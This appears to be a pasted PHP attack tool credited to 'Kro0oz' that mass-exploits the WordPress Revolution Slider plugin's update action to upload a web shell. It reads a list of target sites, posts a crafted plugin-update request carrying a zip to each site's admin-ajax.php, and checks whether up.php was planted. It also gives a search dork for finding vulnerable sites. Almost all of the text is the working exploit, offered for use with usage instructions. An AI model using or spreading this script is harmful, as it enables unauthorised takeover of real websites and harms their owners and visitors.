upload shell

1.  
2. upload shell
3.  
4. Exploit Fail
5.  
6. site/wp-content/plugins/revslider/temp/update_extract/revslider/up.php
7.  
8. Dork :wp-content/plugins/revslider/temp/update_extract/revslider
9.  
10. ##################script#################################
11. ==================================================
12.  
13. <?php
14.  
15. @set_time_limit(0);
16. @error_reporting(0);
17.  
18.  
19. /*
20.  
21. Coded by Kro0oz ~
22.  
23. */
24. print "
25.  
26. .-..-.            .--.            
27. : :' ;           : ,. :            
28. :   ' .--.  .--. : :: : .--. .---.
29. : :.`.: ..'' .; :: :; :' .; :`-'_.'
30. :_;:_;:_;  `.__.'`.__.'`.__.'`.___;
31.                                                      
32. Coded by Kro0oz - upload shell
33.  
34.         usage : php script.php list.txt
35. ";
36.  
37. $g=@file_get_contents($argv[1]);
38. $ex=explode("\r\n",$g);
39. echo "\n\t Total site loaded : ".count($ex)."\n\n";
40. foreach($ex as $link){
41.   echo "[+]Scaning : $link ";
42.   revup($link);
43. }
44.  
45. function revup($site){
46.   $urlex=($site).("/wp-admin/admin-ajax.php");
47.  
48. $post = array('client_action'=>"update_plugin",
49.               "action"=>"revslider_ajax_action",
50.                "update_file" => "@revslider.zip"
51.               ) ;
52.  
53. $ch = curl_init("$urlex");
54. curl_setopt($ch, CURLOPT_POST, true);
55. curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
56. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
57. $postResult = curl_exec($ch);
58. //print $postResult;
59. $path="$site/wp-content/plugins/revslider/temp/update_extract/revslider/up.php";
60. $gett=@file_get_contents($path);
61. if(preg_match('/Kro0oz codersleet/i',$gett)){
62.   echo "\n[+]Exploit Done \n[+]shell : $path \n\n ";
63. }else{
64.    echo "\n[-]Exploit Fail \n\n";
65. }
66.  
67. }
68. ?>